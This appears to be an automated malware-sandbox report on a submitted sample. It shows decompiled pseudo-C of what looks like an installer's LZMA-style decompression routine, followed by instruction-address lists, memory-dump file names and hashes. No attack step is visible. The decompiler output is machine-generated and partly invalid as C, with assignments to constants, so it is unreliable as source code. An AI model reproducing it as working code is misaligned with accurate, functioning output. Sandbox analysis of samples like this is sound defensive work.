											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00407234
0x00407234
0x00407238
0x0040725d
0x00407267
0x00000000
0x0040723a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407247
0x0040724b
0x0040724b
0x0040724e
0x00407328
0x00407328
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x00000000
0x0040746e
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x00000000
0x00406c8b
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x00000000
0x00000000
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00000000
0x00407321
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x00000000
0x00000000
0x004073e2
0x004073e5
0x004072e6
0x004072e6
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00000000
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00407484
0x0040748a
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x004073c3
0x00000000
0x00407238

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F4A Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406F4A() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004074A1))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4)); // executed
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
